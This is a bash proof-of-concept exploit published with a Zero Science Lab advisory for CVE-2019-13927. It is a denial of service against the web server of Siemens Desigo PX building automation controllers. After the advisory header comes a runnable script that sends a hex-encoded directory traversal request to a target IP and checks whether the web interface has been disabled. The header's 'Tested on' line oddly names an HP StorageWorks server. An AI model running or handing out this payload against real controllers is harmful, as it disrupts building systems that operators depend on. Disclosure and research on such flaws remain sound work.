#!/bin/bash # # # Siemens Desigo PX V6.00 Web Remote Denial of Service Exploit # # # Vendor: Siemens AG # Vendor web page: https://www.siemens.com # Product web page: https://new.siemens.com/global/en/products/buildings/automation/desigo.html # Affected version: Model: PXC00-E.D, PXC50-E.D, PXC100-E.D, PXC200-E.D # With Desigo PX Web modules: PXA40-W0, PXA40-W1, PXA40-W2 # All firmware versions < V6.00.320 # ------ # Model: PXC00-U, PXC64-U, PXC128-U # With Desigo PX Web modules: PXA30-W0, PXA30-W1, PXA30-W2 # All firmware versions < V6.00.320 # ------ # Model: PXC22.1-E.D, PXC36-E.D, PXC36.1-E.D # With activated web server # All firmware versions < V6.00.320 # # Summary: Desigo PX is a modern building automation and control # system for the entire field of building service plants. Scalable # from small to large projects with highest degree of energy efficiency, # openness and user-friendly operation. # # Desc: The device contains a vulnerability that could allow an attacker # to cause a denial of service condition on the device's web server # by sending a specially crafted HTTP message to the web server port # (tcp/80). The security vulnerability could be exploited by an attacker # with network access to an affected device. Successful exploitation # requires no system privileges and no user interaction. An attacker # could use the vulnerability to compromise the availability of the # device's web service. While the device itself stays operational, the # web server responds with HTTP status code 404 (Not found) to any further # request. A reboot is required to recover the web interface. # # Tested on: HP StorageWorks MSL4048 httpd # # ================================================================================ # Expected result after sending the directory traversal sequence: /dir?dir=../../: # -------------------------------------------------------------------------------- # # $ curl http://10.0.0.17/index.htm # <HEAD><TITLE>404 Not Found</TITLE></HEAD> # <BODY><H1>404 Not Found</H1> # Url '/INDEX.HTM' not found on server<P> # </BODY> # # ================================================================================ # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Zero Science Lab - https://www.zeroscience.mk # @zeroscience # # # Advisory ID: ZSL-2019-5542 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5542.php # # Vendor ID: SSA-898181 # Vendor Fix: https://support.industry.siemens.com/cs/document/109772802 # Vendor Advisory PDF: https://cert-portal.siemens.com/productcert/pdf/ssa-898181.pdf # Vendor Advisory TXT: https://cert-portal.siemens.com/productcert/txt/ssa-898181.txt # Vendor ACK: https://new.siemens.com/global/en/products/services/cert/hall-of-thanks.html # # CWE ID: CWE-472: External Control of Assumed-Immutable Web Parameter # CWE URL: https://cwe.mitre.org/data/definitions/472.html # CVE ID: CVE-2019-13927 # CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13927 # CVSS v3.1 Base Score: 5.3 # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:H/RL:O/RC:C # # # 06.06.2019 # echo -ne "\n----------------------------------" echo -ne "\nSiemens Desigo PX HTTP Web RMI DoS" echo -ne "\n----------------------------------\n" if [ "$#" -ne 1 ]; then echo -ne "\nUsage: $0 [ipaddr]\n\n" exit fi IP=$1 TARGET="http://$IP/" PAYLOAD=`echo -ne "\x64\x69\x72\x3f\x64\x69\x72\x3d\x2e\x2e\x2f\x2e\x2e\x2f"` echo -ne "\n[+] Sending payload to $IP on port 80." curl -s "$TARGET$PAYLOAD" > /dev/null echo -ne "\n[*] Done" echo -ne "\n[+] Checking if exploit was successful..." status=$(curl -Is http://$IP/index.htm 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$status" == "404" ]; then echo -ne "\n[*] Exploit successful!\n" else echo -ne "\n[-] Exploit unsuccessful.\n" exit fi